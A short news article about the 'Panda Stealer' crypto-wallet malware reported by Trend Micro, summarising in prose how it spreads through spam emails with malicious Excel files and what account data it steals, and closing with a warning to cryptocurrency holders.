The cryptocurrency community has been made aware of the emergence of a new malware that has set its crosshairs towards crypto wallets. It seems that digital currency holders have another thing to be wary of.
Trend Micro recently released a blog post on their website revealing the above-mentioned online threat. According to the blog, they’ve detected this new “information stealer” dubbed the “Panda Stealer” as early as April.
Further, it was explained that this type of malware is being delivered through spam email. If Trend Micro’s telemetry is anything to go by, countries like Germany, Australia, Japan, and the United States were heavily affected by it during what is described as “spam wave.”
It was also learned that this so-called Panda Stealer is a modified iteration of the Collector Stealer malware. This nasty bug also uses a fileless approach in its proliferation for it to avoid getting detected.
How it infects
The deployment of this malware is done via spam emails as it masks itself as business quote requests to lure cryptocurrency holders in opening malicious Excel files. Trend Micro has highlighted a couple of “infection chains”:
- An .XLSM attachment containing the macros that download a loader. The loader then downloads and executes the main stealer.
- The other uses an attached .XLS file that contains an Excel formula that uses a PowerShell command to access a Pastebin alternative – paste.ee. This will then access a second encrypted PowerShell command.
It’s also hungry for your other online details
According to PC Gamer, since this Panda Stealer utilizes a fileless approach to remain unnoticed, it is said that the malware “also has a taste” for details of the victim’s Discord, Steam, NordVPN, and even Telegram accounts. What’s made it even more worrisome is the fact that it can take screenshots, raid a device’s cookie jar, and pilfer passwords and card details.
Now that everything’s being laid to you be very careful surfing the interwebs, especially those in possession of that precious virtual money. Cyber crooks are on the lookout for that online gold.